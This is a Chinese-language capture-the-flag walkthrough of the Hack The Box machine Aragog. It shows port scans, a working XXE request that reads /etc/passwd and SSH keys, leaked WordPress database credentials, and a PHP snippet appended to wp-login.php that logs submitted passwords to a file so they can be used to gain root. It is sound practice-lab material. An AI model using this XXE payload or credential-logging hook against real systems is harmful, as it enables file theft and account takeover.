打靶记录(一三八)之HTBAragog

端口扫描

┌──(mikannse㉿kali)-[~/HTB/aragog]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.78
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 09:55 CST
Nmap scan report for 10.10.10.78
Host is up (0.074s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 8.60 seconds

┌──(mikannse㉿kali)-[~/HTB/aragog]
└─$ sudo nmap -sT -sV -sC -O -p21,22,80 10.10.10.78
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 09:56 CST
Nmap scan report for 10.10.10.78
Host is up (0.069s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.7
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
|   256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
|_  256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://aragog.htb/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (96%), Linux 3.16 (95%), Linux 3.18 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.10 - 4.11 (93%), Linux 3.12 (93%), Linux 3.13 (93%), Linux 3.8 - 3.11 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: aragog.htb; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.36 seconds

添加hosts:aragog.htb

XXE

FTP能匿名登陆，里面一张test.txt告诉了子网掩码,扫目录能得到一个hosts.php，不管是扫描子域名还是爆破hosts.php的参数都没有结果。但网页上的4294967294比较可疑，肯定是根据什么参数进行回显。也许和test.txt的内容有关。把这个test的内容作为post参数传入发现结果改变了

POST /hosts.php HTTP/1.1
Host: aragog.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Length: 88

<details>
    <subnet_mask>255.255.255.192</subnet_mask>
    <test></test>
</details>

会自动计算这个子网掩码中的ip数量,由于这是个xml文件，尝试XXE，成功读取到文件

POST /hosts.php HTTP/1.1
Host: aragog.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Length: 204

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [  
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<details>
    <subnet_mask>&xxe;</subnet_mask>
    <test></test>
</details>

发现存在两个用户cliff和florian，尝试XXE读取他们的ssh私钥,思路和之前THM的一个房间很像

但是只能读到florian的,ssh私钥登录

提权

发现还有一个wordpress的目录，找到数据库连接文件

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', '$@y6CHJ^$#5c37j$#6h');

但是数据库里没有能用的信息，有一个admin但是密码无法破解,那就访问那个wordpress站点，即便无法登录，尝试mysql写入一个webshell,因为看到目录的权限是cliff的，但可惜secure_file_priv有指定路径,并且慢日志也无法使用。

上pspy,发现有以下操作,不断在重置/dev_wiki

2018/05/12 11:15:01 CMD: UID=0    PID=3263   | /usr/sbin/CRON -f
2018/05/12 11:15:01 CMD: UID=0    PID=3262   | /usr/sbin/CRON -f
2018/05/12 11:15:01 CMD: UID=0    PID=3266   | /bin/bash /root/restore.sh
2018/05/12 11:15:01 CMD: UID=0    PID=3265   | /usr/sbin/CRON -f
2018/05/12 11:15:01 CMD: UID=0    PID=3264   | /bin/sh -c /bin/bash /root/restore.sh
2018/05/12 11:15:01 CMD: UID=0    PID=3267   | rm -rf /var/www/html/dev_wiki/
2018/05/12 11:15:01 CMD: UID=1001 PID=3268   | /usr/bin/python /home/cliff/wp-login.py
2018/05/12 11:15:02 CMD: UID=0    PID=3269   | cp -R /var/www/html/zz_backup/ /var/www/html/dev_wiki/
2018/05/12 11:15:02 CMD: UID=1001 PID=3271   | /sbin/ldconfig.real -p
2018/05/12 11:15:02 CMD: UID=1001 PID=3270   | sh -c LC_ALL=C LANG=C /sbin/ldconfig -p 2>/dev/null
2018/05/12 11:15:02 CMD: UID=1001 PID=3272   | sh -c uname -p 2> /dev/null
2018/05/12 11:15:02 CMD: UID=1001 PID=3273   | uname -p
2018/05/12 11:15:02 CMD: UID=0    PID=3274   | chown -R cliff:cliff /var/www/html/dev_wiki/
2018/05/12 11:15:02 CMD: UID=0    PID=3275   | chmod -R 777 /var/www/html/dev_wiki/

/home/cliff/wp-login.py也许是一个自动登录系统的脚本,会自动填入凭据,既然拥有更改目录的权限，那么能够更改wp-login.php的逻辑来记录下凭据

在wp-login.php底部加上:

<?php
$rrr = print_r($_REQUEST, true);
$fff = fopen("/dev/shm/df", "a");
fwrite($fff, $rrr);
fclose($fff);

过一会儿后能够在此文件中得到密码

florian@aragog:/var/www/html/dev_wiki$ cat /dev/shm/df
Array
(
    [testcookie] => 1
    [pwd] => !KRgYs(JFO!&MTr)lf
    [redirect_to] => http://aragog.htb/dev_wiki/wp-admin/
    [wp-submit] => Log In
    [log] => Administrator
)
Array
(
    [redirect_to] => http://aragog.htb/dev_wiki/wp-admin/
    [reauth] => 1
)

可以用来登录root

碎碎念

XXE加改文件抓取凭证